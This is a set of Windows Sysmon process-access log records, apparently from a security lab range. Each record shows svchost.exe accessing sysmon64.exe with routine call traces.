{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4534,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4535,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4536,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4537,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4538,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4539,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4540,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4541,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
